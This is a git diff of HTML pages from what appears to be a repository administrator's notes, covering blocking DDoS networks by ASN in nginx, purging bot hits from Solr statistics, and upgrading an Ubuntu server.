                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ cat /tmp/ips-june23.txt /tmp/ips-jul16.txt | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +10458
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • I purged all the (26,000) hits from these new IP addresses from Solr as well
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Looking back at my notes for the 2019-05 attack I see that I had already identified most of these network providers (!)…
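The combined count above only implies that the two attacks used mostly different addresses. The overlap can also be counted directly. This is a minimal sketch, assuming both files hold one IP address per line; the function names `count_union` and `count_common` are hypothetical helpers, not part of any script mentioned in these notes:

```shell
# Hypothetical helpers for comparing two IP lists (one address per line).

# Number of unique addresses across both files,
# equivalent to: cat a b | sort | uniq | wc -l
count_union() {
    sort -u "$1" "$2" | wc -l | tr -d ' '
}

# Number of addresses that appear in both files.
# Each file is de-duplicated first, so any line that is still
# duplicated after merging must have come from both files.
count_common() {
    { sort -u "$1"; sort -u "$2"; } | sort | uniq -d | wc -l | tr -d ' '
}
```

For example, `count_common /tmp/ips-june23.txt /tmp/ips-jul16.txt` would print how many addresses took part in both attacks, assuming those are the same files used in the `cat` command above.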
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            @@ -636,30 +636,30 @@ $ csvcut -c 2,4 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Adding QuadraNet brings the total networks seen during these two attacks to 262, and the number of unique IPs to 10900:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 /var/log/nginx/access.log.3 /var/log/nginx/access.log.4 /var/log/nginx/access.log.5 /var/log/nginx/access.log.27.gz /var/log/nginx/access.log.28.gz | grep -E " (200|499) " | grep -v -E "(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)" | awk '{print $1}' | sort | uniq > /tmp/ddos-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -# wc -l /tmp/ddos-ips.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -54002 /tmp/ddos-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ddos-ips.txt -o /tmp/ddos-ips.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624|8100)$' /tmp/ddos-ips.csv | csvcut -c ip | sed 1d | sort | uniq > /tmp/ddos-ips-to-purge.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ wc -l /tmp/ddos-ips-to-purge.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -10900 /tmp/ddos-ips-to-purge.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624|8100)$' /tmp/ddos-ips.csv | csvcut -c network | sed 1d | sort | uniq > /tmp/ddos-networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ wc -l /tmp/ddos-networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -262 /tmp/ddos-networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 /var/log/nginx/access.log.3 /var/log/nginx/access.log.4 /var/log/nginx/access.log.5 /var/log/nginx/access.log.27.gz /var/log/nginx/access.log.28.gz | grep -E " (200|499) " | grep -v -E "(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)" | awk '{print $1}' | sort | uniq > /tmp/ddos-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +# wc -l /tmp/ddos-ips.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +54002 /tmp/ddos-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ddos-ips.txt -o /tmp/ddos-ips.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624|8100)$' /tmp/ddos-ips.csv | csvcut -c ip | sed 1d | sort | uniq > /tmp/ddos-ips-to-purge.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ wc -l /tmp/ddos-ips-to-purge.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +10900 /tmp/ddos-ips-to-purge.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624|8100)$' /tmp/ddos-ips.csv | csvcut -c network | sed 1d | sort | uniq > /tmp/ddos-networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ wc -l /tmp/ddos-networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +262 /tmp/ddos-networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • The new total number of networks to block, including the network prefixes for these ASNs downloaded from asn.ipinfo.app, is 4,007:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            $ wget https://asn.ipinfo.app/api/text/nginx/AS49453 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -https://asn.ipinfo.app/api/text/nginx/AS46844 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -https://asn.ipinfo.app/api/text/nginx/AS206485 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -https://asn.ipinfo.app/api/text/nginx/AS62282 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -https://asn.ipinfo.app/api/text/nginx/AS36352 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -https://asn.ipinfo.app/api/text/nginx/AS35913 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -https://asn.ipinfo.app/api/text/nginx/AS35624 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -https://asn.ipinfo.app/api/text/nginx/AS8100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -$ cat AS* /tmp/ddos-networks-to-block.txt | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -4007
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              $ wget https://asn.ipinfo.app/api/text/nginx/AS49453 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +https://asn.ipinfo.app/api/text/nginx/AS46844 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +https://asn.ipinfo.app/api/text/nginx/AS206485 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +https://asn.ipinfo.app/api/text/nginx/AS62282 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +https://asn.ipinfo.app/api/text/nginx/AS36352 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +https://asn.ipinfo.app/api/text/nginx/AS35913 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +https://asn.ipinfo.app/api/text/nginx/AS35624 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +https://asn.ipinfo.app/api/text/nginx/AS8100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +$ cat AS* /tmp/ddos-networks-to-block.txt | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +4007
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • I re-applied these networks to nginx on CGSpace (linode18) and DSpace Test (linode26), and purged 14,000 more Solr statistics hits from these IPs
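The de-duplication step in the pipeline above can be pulled into a small reusable function. This is only a sketch: the function name `normalize_networks` and the sample input are hypothetical, and it assumes the downloaded files use nginx's `deny <network>;` form, as the `sed` expressions above suggest.

```shell
#!/bin/sh
# Sketch: reduce a mix of nginx "deny" lines and bare networks to a sorted,
# unique list. The function name is hypothetical, not part of any tool.
normalize_networks() {
    # Drop blank lines, comments and lines starting with "{", then strip the
    # "deny " prefix and the trailing ";" before sorting and de-duplicating.
    sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | sort -u
}

# Example with made-up documentation networks (RFC 5737), not real data:
normalize_networks <<'EOF'
# example list
deny 192.0.2.0/24;

198.51.100.0/24
deny 198.51.100.0/24;
EOF
```

Piping the result through `wc -l` gives the count of unique networks, which is how the 4,007 figure above was obtained from the real files.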

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2021-07-22

diff --git a/docs/2021-08/index.html b/docs/2021-08/index.html
index a2c8486cb..6d29f912e 100644
--- a/docs/2021-08/index.html
+++ b/docs/2021-08/index.html
@@ -32,7 +32,7 @@ Update Docker images on AReS server (linode20) and reboot the server: I decided to upgrade linode20 from Ubuntu 18.04 to 20.04 "/>
-
+
@@ -122,37 +122,37 @@ I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Update Docker images on AReS server (linode20) and reboot the server:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              # docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                # docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
• First I ran all pending updates, took some backups, checked for broken packages, and then rebooted:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                # apt update && apt dist-upgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -# apt autoremove && apt autoclean
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -# check for any packages with residual configs we can purge
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -# dpkg -l | grep -E '^rc' | awk '{print $2}'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -# dpkg -l | grep -E '^rc' | awk '{print $2}' | xargs dpkg -P
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -# dpkg -C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -# dpkg -l > 2021-08-01-linode20-dpkg.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -# tar -I zstd -cvf 2021-08-01-etc.tar.zst /etc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -# reboot
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -# sed -i 's/bionic/focal/' /etc/apt/sources.list.d/*.list
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -# do-release-upgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  # apt update && apt dist-upgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# apt autoremove && apt autoclean
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# check for any packages with residual configs we can purge
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# dpkg -l | grep -E '^rc' | awk '{print $2}'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# dpkg -l | grep -E '^rc' | awk '{print $2}' | xargs dpkg -P
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# dpkg -C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# dpkg -l > 2021-08-01-linode20-dpkg.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# tar -I zstd -cvf 2021-08-01-etc.tar.zst /etc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# reboot
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# sed -i 's/bionic/focal/' /etc/apt/sources.list.d/*.list
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# do-release-upgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • … but of course it hit the libxcrypt bug
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • I had to get a copy of libcrypt.so.1.1.0 from a working Ubuntu 20.04 system and finish the upgrade manually
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  # apt install -f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -# apt dist-upgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -# reboot
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    # apt install -f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +# apt dist-upgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +# reboot
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • After rebooting I purged all packages with residual configs and cleaned up again:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    # dpkg -l | grep -E '^rc' | awk '{print $2}' | xargs dpkg -P
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -# apt autoremove && apt autoclean
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 /var/log/nginx/access.log.3 /var/log/nginx/access.log.4 /var/log/nginx/access.log.5 /var/log/nginx/access.log.6 /var/log/nginx/access.log.7 /var/log/nginx/access.log.8 | grep -E " (200|499) " | grep -v -E "(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)" | awk '{print $1}' | sort | uniq > /tmp/2021-08-05-all-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -# wc -l /tmp/2021-08-05-all-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -43428 /tmp/2021-08-05-all-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 /var/log/nginx/access.log.3 /var/log/nginx/access.log.4 /var/log/nginx/access.log.5 /var/log/nginx/access.log.6 /var/log/nginx/access.log.7 /var/log/nginx/access.log.8 | grep -E " (200|499) " | grep -v -E "(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)" | awk '{print $1}' | sort | uniq > /tmp/2021-08-05-all-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +# wc -l /tmp/2021-08-05-all-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +43428 /tmp/2021-08-05-all-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Already I can see that the total is much less than during the attack on one weekend last month (over 50,000!)
• Indeed, I see that there are no IPs from those networks coming in now:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ ./ilri/resolve-addresses-geoip2.py -i /tmp/2021-08-05-all-ips.txt -o /tmp/2021-08-05-all-ips.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624|8100)$' /tmp/2021-08-05-all-ips.csv | csvcut -c ip | sed 1d | sort | uniq > /tmp/2021-08-05-all-ips-to-purge.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ wc -l /tmp/2021-08-05-all-ips-to-purge.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -0 /tmp/2021-08-05-all-ips-to-purge.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2021-08-08

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ ./ilri/resolve-addresses-geoip2.py -i /tmp/2021-08-05-all-ips.txt -o /tmp/2021-08-05-all-ips.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624|8100)$' /tmp/2021-08-05-all-ips.csv | csvcut -c ip | sed 1d | sort | uniq > /tmp/2021-08-05-all-ips-to-purge.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ wc -l /tmp/2021-08-05-all-ips-to-purge.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +0 /tmp/2021-08-05-all-ips-to-purge.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
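The `csvgrep | csvcut | sed | sort | uniq` pipeline above can also be expressed in a few lines of Python. This is only a minimal sketch, assuming the CSV written by `resolve-addresses-geoip2.py` has `ip` and `asn` columns (as the `-c asn` and `-c ip` options above imply). The function name `ips_for_asns` and the sample rows are hypothetical and only for illustration.

```python
import csv
import io

# ASNs copied from the csvgrep pattern in the command above
ASNS_TO_PURGE = {"49453", "46844", "206485", "62282", "36352", "35913", "35624", "8100"}


def ips_for_asns(csv_file, asns=ASNS_TO_PURGE):
    """Return the sorted, de-duplicated IPs whose asn column is in asns.

    Assumes the CSV has a header row with "ip" and "asn" columns.
    """
    reader = csv.DictReader(csv_file)
    return sorted({row["ip"] for row in reader if row["asn"].strip() in asns})


if __name__ == "__main__":
    # Hypothetical sample data using documentation-only IP ranges
    sample = io.StringIO(
        "ip,asn\n"
        "192.0.2.1,8100\n"
        "192.0.2.1,8100\n"
        "198.51.100.7,15169\n"
    )
    print(ips_for_asns(sample))
```

An empty result corresponds to the `0` reported by `wc -l` above: none of the remaining client IPs belong to the listed networks.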

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2021-08-08

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Advise IWMI colleagues on best practices for thumbnails
• Add a handful of mappings for incorrect countries, regions, and licenses on AReS and start a new harvest
@@ -220,8 +220,8 @@ $ wc -l /tmp/2021-08-05-all-ips-to-purge.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • That IP is on Amazon, and from looking at the DSpace logs I don’t see them logging in at all, only scraping… so I will purge hits from that IP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • I see 93.158.90.30 is some Swedish IP that also has a normal-looking user agent, but never logs in and requests thousands of XMLUI pages, I will purge their hits too
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          @@ -232,14 +232,14 @@ $ wc -l /tmp/2021-08-05-all-ips-to-purge.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • 3.225.28.105 uses a normal-looking user agent but makes thousands of request to the REST API a few seconds apart
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • 61.143.40.50 is in China and uses this hilarious user agent:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.{random.randint(0, 9999)} Safari/537.{random.randint(0, 99)}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.{random.randint(0, 9999)} Safari/537.{random.randint(0, 99)}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • 47.252.80.214 is owned by Alibaba in the US and has the same user agent
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • 159.138.131.15 is in Hong Kong and also seems to be a bot because I never see it log in and it downloads 4,300 PDFs over the course of a few hours
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • 95.87.154.12 seems to be a new bot with the following user agent:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Mozilla/5.0 (compatible; MaCoCu; +https://www.clarin.si/info/macocu-massive-collection-and-curation-of-monolingual-and-bilingual-data/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Mozilla/5.0 (compatible; MaCoCu; +https://www.clarin.si/info/macocu-massive-collection-and-curation-of-monolingual-and-bilingual-data/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • They have a legitimate EU-funded project to enrich data for under-resourced languages in the EU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • I will purge the hits and add them to our list of bot overrides in the mean time before I submit it to COUNTER-Robots
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • @@ -247,37 +247,37 @@ $ wc -l /tmp/2021-08-05-all-ips-to-purge.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • I see a new bot using this user agent:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              nettle (+https://www.nettle.sk)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                nettle (+https://www.nettle.sk)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • 129.0.211.251 is in Cameroon and uses a normal-looking user agent, but seems to be a bot of some sort, as it downloaded 900 PDFs over a short period.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • 217.182.21.193 is on OVH in France and uses a Linux user agent, but never logs in and makes several requests per minute, over 1,000 in a day
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • 103.135.104.139 is in Hong Kong and also seems to be making real requests, but makes way too many to be a human
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • There are probably more but that’s most of them over 1,000 hits last month, so I will purge them:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 10796 hits from 35.174.144.154 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 9993 hits from 93.158.90.30 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 6092 hits from 130.255.162.173 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 24863 hits from 3.225.28.105 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 2988 hits from 93.158.90.91 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 2497 hits from 61.143.40.50 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 13866 hits from 159.138.131.15 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 2721 hits from 95.87.154.12 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 2786 hits from 47.252.80.214 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 1485 hits from 129.0.211.251 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 8952 hits from 217.182.21.193 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Purging 3446 hits from 103.135.104.139 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -Total number of bot hits purged: 90485
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 10796 hits from 35.174.144.154 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 9993 hits from 93.158.90.30 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 6092 hits from 130.255.162.173 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 24863 hits from 3.225.28.105 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 2988 hits from 93.158.90.91 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 2497 hits from 61.143.40.50 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 13866 hits from 159.138.131.15 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 2721 hits from 95.87.154.12 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 2786 hits from 47.252.80.214 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 1485 hits from 129.0.211.251 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 8952 hits from 217.182.21.193 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Purging 3446 hits from 103.135.104.139 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +Total number of bot hits purged: 90485
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Then I purged a few thousand more by user agent:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
